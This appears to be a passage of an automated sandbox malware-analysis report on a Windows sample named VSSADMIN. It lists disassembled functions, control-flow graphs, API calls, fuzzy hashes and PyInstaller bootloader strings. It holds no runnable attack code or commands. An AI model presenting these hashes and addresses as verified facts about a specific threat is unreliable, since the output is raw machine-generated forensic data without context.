                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 2030045667-3659356012
                                                                                                                                                                      • Opcode ID: 16d69012473f287e44de233c574f772ca318ffc925a49ceb0965c1371dea1f1c
                                                                                                                                                                      • Instruction ID: a0598e4fadd19149a255bd768ab991572d06555c9effa631d1c1ddc6ed4a0ed0
                                                                                                                                                                      • Opcode Fuzzy Hash: 16d69012473f287e44de233c574f772ca318ffc925a49ceb0965c1371dea1f1c
                                                                                                                                                                      • Instruction Fuzzy Hash: 32415E21A4CE8382EE24DB15E4916BA63B1EB86FA5F444433DE4D87B55EE3DE542C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C71000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 300 7ff614c71000-7ff614c736a6 call 7ff614c7f0b0 call 7ff614c7f0a8 call 7ff614c77630 call 7ff614c7f0a8 call 7ff614c7ade0 call 7ff614c842a0 call 7ff614c84f44 call 7ff614c71af0 318 7ff614c736ac-7ff614c736bb call 7ff614c73bc0 300->318 319 7ff614c737ba 300->319 318->319 324 7ff614c736c1-7ff614c736d4 call 7ff614c73a90 318->324 321 7ff614c737bf-7ff614c737df call 7ff614c7adb0 319->321 324->319 328 7ff614c736da-7ff614c736ed call 7ff614c73b40 324->328 328->319 331 7ff614c736f3-7ff614c7371a call 7ff614c769b0 328->331 334 7ff614c7375c-7ff614c73784 call 7ff614c76fc0 call 7ff614c719d0 331->334 335 7ff614c7371c-7ff614c7372b call 7ff614c769b0 331->335 346 7ff614c7386d-7ff614c7387e 334->346 347 7ff614c7378a-7ff614c737a0 call 7ff614c719d0 334->347 335->334 340 7ff614c7372d-7ff614c73733 335->340 342 7ff614c73735-7ff614c7373d 340->342 343 7ff614c7373f-7ff614c73759 call 7ff614c840cc call 7ff614c76fc0 340->343 342->343 343->334 350 7ff614c73893-7ff614c738ab call 7ff614c77a60 346->350 351 7ff614c73880-7ff614c7388a call 7ff614c732a0 346->351 356 7ff614c737a2-7ff614c737b5 call 7ff614c72770 347->356 357 7ff614c737e0-7ff614c737e3 347->357 365 7ff614c738ad-7ff614c738b9 call 7ff614c72770 350->365 366 7ff614c738be-7ff614c738c5 SetDllDirectoryW 350->366 363 7ff614c7388c 351->363 364 7ff614c738cb-7ff614c738d8 call 7ff614c75e60 351->364 356->319 357->346 362 7ff614c737e9-7ff614c73800 call 7ff614c73cd0 357->362 375 7ff614c73807-7ff614c73833 call 7ff614c77230 362->375 376 7ff614c73802-7ff614c73805 362->376 363->350 373 7ff614c738da-7ff614c738ea call 7ff614c75b00 364->373 374 7ff614c73926-7ff614c7392b call 7ff614c75de0 364->374 365->319 366->364 373->374 390 7ff614c738ec-7ff614c738fb call 7ff614c75660 373->390 382 7ff614c73930-7ff614c73933 374->382 385 7ff614c7385d-7ff614c7386b 375->385 386 7ff614c73835-7ff614c7383d call 7ff614c7f2dc 375->386 379 7ff614c73842-7ff614c73858 call 7ff614c72770 376->379 379->319 388 7ff614c73939-7ff614c73946 382->388 389 7ff614c739e6-7ff614c739ee call 7ff614c73130 382->389 385->351 386->379 392 7ff614c73950-7ff614c7395a 388->392 399 7ff614c739f3-7ff614c739f5 389->399 402 7ff614c7391c-7ff614c73921 call 7ff614c758b0 390->402 403 7ff614c738fd-7ff614c73909 call 7ff614c755e0 390->403 396 7ff614c7395c-7ff614c73961 392->396 397 7ff614c73963-7ff614c73965 392->397 396->392 396->397 400 7ff614c73967-7ff614c7398a call 7ff614c71b30 397->400 401 7ff614c739b1-7ff614c739bc call 7ff614c73290 call 7ff614c730d0 397->401 399->319 404 7ff614c739fb-7ff614c73a32 call 7ff614c76f50 call 7ff614c769b0 call 7ff614c753f0 399->404 400->319 416 7ff614c73990-7ff614c7399b 400->416 420 7ff614c739c1-7ff614c739e1 call 7ff614c73280 call 7ff614c758b0 call 7ff614c75de0 401->420 402->374 403->402 417 7ff614c7390b-7ff614c7391a call 7ff614c75cb0 403->417 404->319 427 7ff614c73a38-7ff614c73a6d call 7ff614c73290 call 7ff614c77000 call 7ff614c758b0 call 7ff614c75de0 404->427 421 7ff614c739a0-7ff614c739af 416->421 417->382 420->321 421->401 421->421 440 7ff614c73a77-7ff614c73a81 call 7ff614c71ab0 427->440 441 7ff614c73a6f-7ff614c73a72 call 7ff614c76cc0 427->441 440->321 441->440
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF614C73BC0: GetModuleFileNameW.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C73BF1
                                                                                                                                                                      • SetDllDirectoryW.KERNEL32 ref: 00007FF614C738C5
                                                                                                                                                                        • Part of subcall function 00007FF614C769B0: GetEnvironmentVariableW.KERNEL32(00007FF614C73707), ref: 00007FF614C769EA
                                                                                                                                                                        • Part of subcall function 00007FF614C769B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF614C76A07
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                      • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                      • API String ID: 2344891160-3602715111
                                                                                                                                                                      • Opcode ID: f952f029dedbb0839787106c5c451913a2ed49eabae97769c7967d6c7db2bfcd
                                                                                                                                                                      • Instruction ID: 9ec78fc48b73ec43f0d657773c76d560a36c888231572b90cab4fcc9a688604f
                                                                                                                                                                      • Opcode Fuzzy Hash: f952f029dedbb0839787106c5c451913a2ed49eabae97769c7967d6c7db2bfcd
                                                                                                                                                                      • Instruction Fuzzy Hash: F0B18121A1CD8352EA64AB21D5D22BD23B1BF46FA6F444033EA4DC77A6EE2CE505C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C71050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 445 7ff614c71050-7ff614c710ab call 7ff614c7a640 448 7ff614c710ad-7ff614c710d2 call 7ff614c72770 445->448 449 7ff614c710d3-7ff614c710eb call 7ff614c840e0 445->449 454 7ff614c710ed-7ff614c71104 call 7ff614c724d0 449->454 455 7ff614c71109-7ff614c71119 call 7ff614c840e0 449->455 460 7ff614c7126c-7ff614c712a0 call 7ff614c7a320 call 7ff614c840cc * 2 454->460 461 7ff614c7111b-7ff614c71132 call 7ff614c724d0 455->461 462 7ff614c71137-7ff614c71147 455->462 461->460 464 7ff614c71150-7ff614c71175 call 7ff614c7f62c 462->464 472 7ff614c7117b-7ff614c71185 call 7ff614c7f3a0 464->472 473 7ff614c7125e 464->473 472->473 479 7ff614c7118b-7ff614c71197 472->479 475 7ff614c71264 473->475 475->460 480 7ff614c711a0-7ff614c711c8 call 7ff614c78a90 479->480 483 7ff614c711ca-7ff614c711cd 480->483 484 7ff614c71241-7ff614c7125c call 7ff614c72770 480->484 485 7ff614c7123c 483->485 486 7ff614c711cf-7ff614c711d9 483->486 484->475 485->484 488 7ff614c711db-7ff614c711e8 call 7ff614c7fd6c 486->488 489 7ff614c71203-7ff614c71206 486->489 496 7ff614c711ed-7ff614c711f0 488->496 492 7ff614c71208-7ff614c71216 call 7ff614c7bb90 489->492 493 7ff614c71219-7ff614c7121e 489->493 492->493 493->480 495 7ff614c71220-7ff614c71223 493->495 498 7ff614c71237-7ff614c7123a 495->498 499 7ff614c71225-7ff614c71228 495->499 500 7ff614c711f2-7ff614c711fc call 7ff614c7f3a0 496->500 501 7ff614c711fe-7ff614c71201 496->501 498->475 499->484 502 7ff614c7122a-7ff614c71232 499->502 500->493 500->501 501->484 502->464
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                      • API String ID: 2030045667-1655038675
                                                                                                                                                                      • Opcode ID: 9cfd913426aeb6d050e1e33f254d3393e8c1727ed5781516926cd4c3ba63f663
                                                                                                                                                                      • Instruction ID: 5067d7a9787a24981a0425461bf047e5ed231096b45583fac2050321c02ac1f1
                                                                                                                                                                      • Opcode Fuzzy Hash: 9cfd913426aeb6d050e1e33f254d3393e8c1727ed5781516926cd4c3ba63f663
                                                                                                                                                                      • Instruction Fuzzy Hash: 6051A422A0DE8286EA209B55E4803BA62B2FB86FB5F544137DE4DC7795EF3CE545C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8AF5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 505 7ff614c8af5c-7ff614c8af82 506 7ff614c8af84-7ff614c8af98 call 7ff614c84454 call 7ff614c84474 505->506 507 7ff614c8af9d-7ff614c8afa1 505->507 521 7ff614c8b38e 506->521 508 7ff614c8b377-7ff614c8b383 call 7ff614c84454 call 7ff614c84474 507->508 509 7ff614c8afa7-7ff614c8afae 507->509 528 7ff614c8b389 call 7ff614c89de0 508->528 509->508 511 7ff614c8afb4-7ff614c8afe2 509->511 511->508 514 7ff614c8afe8-7ff614c8afef 511->514 518 7ff614c8aff1-7ff614c8b003 call 7ff614c84454 call 7ff614c84474 514->518 519 7ff614c8b008-7ff614c8b00b 514->519 518->528 524 7ff614c8b011-7ff614c8b017 519->524 525 7ff614c8b373-7ff614c8b375 519->525 526 7ff614c8b391-7ff614c8b3a8 521->526 524->525 529 7ff614c8b01d-7ff614c8b020 524->529 525->526 528->521 529->518 532 7ff614c8b022-7ff614c8b047 529->532 534 7ff614c8b049-7ff614c8b04b 532->534 535 7ff614c8b07a-7ff614c8b081 532->535 538 7ff614c8b072-7ff614c8b078 534->538 539 7ff614c8b04d-7ff614c8b054 534->539 536 7ff614c8b083-7ff614c8b0ab call 7ff614c8cafc call 7ff614c89e48 * 2 535->536 537 7ff614c8b056-7ff614c8b06d call 7ff614c84454 call 7ff614c84474 call 7ff614c89de0 535->537 565 7ff614c8b0c8-7ff614c8b0f3 call 7ff614c8b784 536->565 566 7ff614c8b0ad-7ff614c8b0c3 call 7ff614c84474 call 7ff614c84454 536->566 569 7ff614c8b200 537->569 541 7ff614c8b0f8-7ff614c8b10f 538->541 539->537 539->538 544 7ff614c8b111-7ff614c8b119 541->544 545 7ff614c8b18a-7ff614c8b194 call 7ff614c92a6c 541->545 544->545 549 7ff614c8b11b-7ff614c8b11d 544->549 556 7ff614c8b21e 545->556 557 7ff614c8b19a-7ff614c8b1af 545->557 549->545 553 7ff614c8b11f-7ff614c8b135 549->553 553->545 558 7ff614c8b137-7ff614c8b143 553->558 560 7ff614c8b223-7ff614c8b243 ReadFile 556->560 557->556 562 7ff614c8b1b1-7ff614c8b1c3 GetConsoleMode 557->562 558->545 563 7ff614c8b145-7ff614c8b147 558->563 567 7ff614c8b249-7ff614c8b251 560->567 568 7ff614c8b33d-7ff614c8b346 GetLastError 560->568 562->556 570 7ff614c8b1c5-7ff614c8b1cd 562->570 563->545 571 7ff614c8b149-7ff614c8b161 563->571 565->541 566->569 567->568 573 7ff614c8b257 567->573 576 7ff614c8b363-7ff614c8b366 568->576 577 7ff614c8b348-7ff614c8b35e call 7ff614c84474 call 7ff614c84454 568->577 578 7ff614c8b203-7ff614c8b20d call 7ff614c89e48 569->578 570->560 575 7ff614c8b1cf-7ff614c8b1f1 ReadConsoleW 570->575 571->545 579 7ff614c8b163-7ff614c8b16f 571->579 584 7ff614c8b25e-7ff614c8b273 573->584 586 7ff614c8b212-7ff614c8b21c 575->586 587 7ff614c8b1f3 GetLastError 575->587 581 7ff614c8b1f9-7ff614c8b1fb call 7ff614c843e8 576->581 582 7ff614c8b36c-7ff614c8b36e 576->582 577->569 578->526 579->545 580 7ff614c8b171-7ff614c8b173 579->580 580->545 590 7ff614c8b175-7ff614c8b185 580->590 581->569 582->578 584->578 592 7ff614c8b275-7ff614c8b280 584->592 586->584 587->581 590->545 597 7ff614c8b282-7ff614c8b29b call 7ff614c8ab74 592->597 598 7ff614c8b2a7-7ff614c8b2af 592->598 605 7ff614c8b2a0-7ff614c8b2a2 597->605 601 7ff614c8b2b1-7ff614c8b2c3 598->601 602 7ff614c8b32b-7ff614c8b338 call 7ff614c8a9b4 598->602 606 7ff614c8b31e-7ff614c8b326 601->606 607 7ff614c8b2c5 601->607 602->605 605->578 606->578 609 7ff614c8b2ca-7ff614c8b2d1 607->609 610 7ff614c8b2d3-7ff614c8b2d7 609->610 611 7ff614c8b30d-7ff614c8b318 609->611 612 7ff614c8b2f3 610->612 613 7ff614c8b2d9-7ff614c8b2e0 610->613 611->606 615 7ff614c8b2f9-7ff614c8b309 612->615 613->612 614 7ff614c8b2e2-7ff614c8b2e6 613->614 614->612 616 7ff614c8b2e8-7ff614c8b2f1 614->616 615->609 617 7ff614c8b30b 615->617 616->615 617->606
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 8cca3055efed3e3f89cedb163d8cd8c244730e245ca1d8d25453f07a0b7e0f34
                                                                                                                                                                      • Instruction ID: b024cd018be5e20a4874668f1fac934165e01dcbf1ff94a235946bc27ce63cec
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cca3055efed3e3f89cedb163d8cd8c244730e245ca1d8d25453f07a0b7e0f34
                                                                                                                                                                      • Instruction Fuzzy Hash: D8C1B23290CE8791EA609B15D4802BE6A70FB83FA0F554137EA5E87792EF7DE445D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B1CC Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452418845-0
                                                                                                                                                                      • Opcode ID: bbd3b8ba5c4b27b365bd4a2e4f7617ab8f70cbce2ec9e80b5769bfa1af1ddc25
                                                                                                                                                                      • Instruction ID: 1a9aaf4158639f587fd48fa07908b1b63d74956d7f4ae854f33bcb677f76da95
                                                                                                                                                                      • Opcode Fuzzy Hash: bbd3b8ba5c4b27b365bd4a2e4f7617ab8f70cbce2ec9e80b5769bfa1af1ddc25
                                                                                                                                                                      • Instruction Fuzzy Hash: F5317820E0DD4342FA14AB64E4D13BA22B1AF93FAEF405037DB0DC76E3EE2DA4448251
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C846B0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                      • Opcode ID: 83f7356e998cb81ecf05bcbd92d34611756d56775b93fee33aed4649b58a8721
                                                                                                                                                                      • Instruction ID: 6e746ff8c10a07264a1b2750a7be2a62dccb794005f63ddfb84f973f81dd184b
                                                                                                                                                                      • Opcode Fuzzy Hash: 83f7356e998cb81ecf05bcbd92d34611756d56775b93fee33aed4649b58a8721
                                                                                                                                                                      • Instruction Fuzzy Hash: E2417262D18B8283F7548B61D590379B270FB96B74F10933AE69C83AD1EF7CA5A09704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7F3CC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 917 7ff614c7f3cc-7ff614c7f3f9 918 7ff614c7f3fb-7ff614c7f3fe 917->918 919 7ff614c7f415 917->919 918->919 920 7ff614c7f400-7ff614c7f403 918->920 921 7ff614c7f417-7ff614c7f42b 919->921 922 7ff614c7f42c-7ff614c7f42f 920->922 923 7ff614c7f405-7ff614c7f40a call 7ff614c84474 920->923 924 7ff614c7f431-7ff614c7f43d 922->924 925 7ff614c7f43f-7ff614c7f443 922->925 935 7ff614c7f410 call 7ff614c89de0 923->935 924->925 927 7ff614c7f46a-7ff614c7f473 924->927 928 7ff614c7f457-7ff614c7f45a 925->928 929 7ff614c7f445-7ff614c7f44f call 7ff614c7c240 925->929 933 7ff614c7f47a 927->933 934 7ff614c7f475-7ff614c7f478 927->934 928->923 932 7ff614c7f45c-7ff614c7f468 928->932 929->928 932->923 932->927 937 7ff614c7f47f-7ff614c7f49e 933->937 934->937 935->919 939 7ff614c7f5e5-7ff614c7f5e8 937->939 940 7ff614c7f4a4-7ff614c7f4b2 937->940 939->921 941 7ff614c7f52a-7ff614c7f52f 940->941 942 7ff614c7f4b4-7ff614c7f4bb 940->942 944 7ff614c7f59c-7ff614c7f59f call 7ff614c8b3ac 941->944 945 7ff614c7f531-7ff614c7f53d 941->945 942->941 943 7ff614c7f4bd 942->943 947 7ff614c7f4c3-7ff614c7f4cd 943->947 948 7ff614c7f610 943->948 954 7ff614c7f5a4-7ff614c7f5a7 944->954 949 7ff614c7f549-7ff614c7f54f 945->949 950 7ff614c7f53f-7ff614c7f546 945->950 951 7ff614c7f5ed-7ff614c7f5f1 947->951 955 7ff614c7f4d3-7ff614c7f4d9 947->955 953 7ff614c7f615-7ff614c7f620 948->953 949->951 952 7ff614c7f555-7ff614c7f572 call 7ff614c891b4 call 7ff614c8af5c 949->952 950->949 958 7ff614c7f5f3-7ff614c7f5fb call 7ff614c7c240 951->958 959 7ff614c7f600-7ff614c7f60b call 7ff614c84474 951->959 976 7ff614c7f577-7ff614c7f579 952->976 953->921 954->953 961 7ff614c7f5a9-7ff614c7f5ac 954->961 956 7ff614c7f4db-7ff614c7f4de 955->956 957 7ff614c7f511-7ff614c7f525 955->957 962 7ff614c7f4fc-7ff614c7f507 call 7ff614c84474 call 7ff614c89de0 956->962 963 7ff614c7f4e0-7ff614c7f4e6 956->963 968 7ff614c7f5cc-7ff614c7f5d7 957->968 958->959 959->935 961->951 967 7ff614c7f5ae-7ff614c7f5c5 961->967 983 7ff614c7f50c 962->983 969 7ff614c7f4e8-7ff614c7f4f0 call 7ff614c7bb90 963->969 970 7ff614c7f4f2-7ff614c7f4f7 call 7ff614c7c240 963->970 967->968 968->940 974 7ff614c7f5dd 968->974 969->983 970->962 974->939 980 7ff614c7f625-7ff614c7f62a 976->980 981 7ff614c7f57f 976->981 980->953 981->948 984 7ff614c7f585-7ff614c7f59a 981->984 983->957 984->968
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 1c1e28680f2662e8371b11e07f92ce548ff8955c9ec9e7def54785ee8c89af03
                                                                                                                                                                      • Instruction ID: d63eb1cfdc3b1a358e1555099081bbf8e1bf2162cb84e394e83cfe1a099c9834
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c1e28680f2662e8371b11e07f92ce548ff8955c9ec9e7def54785ee8c89af03
                                                                                                                                                                      • Instruction Fuzzy Hash: CB511561B0DA8347EA68DE2594E067A62A0BF46FB5F144732DE6CC37D5CF3CD4018600
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B0E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
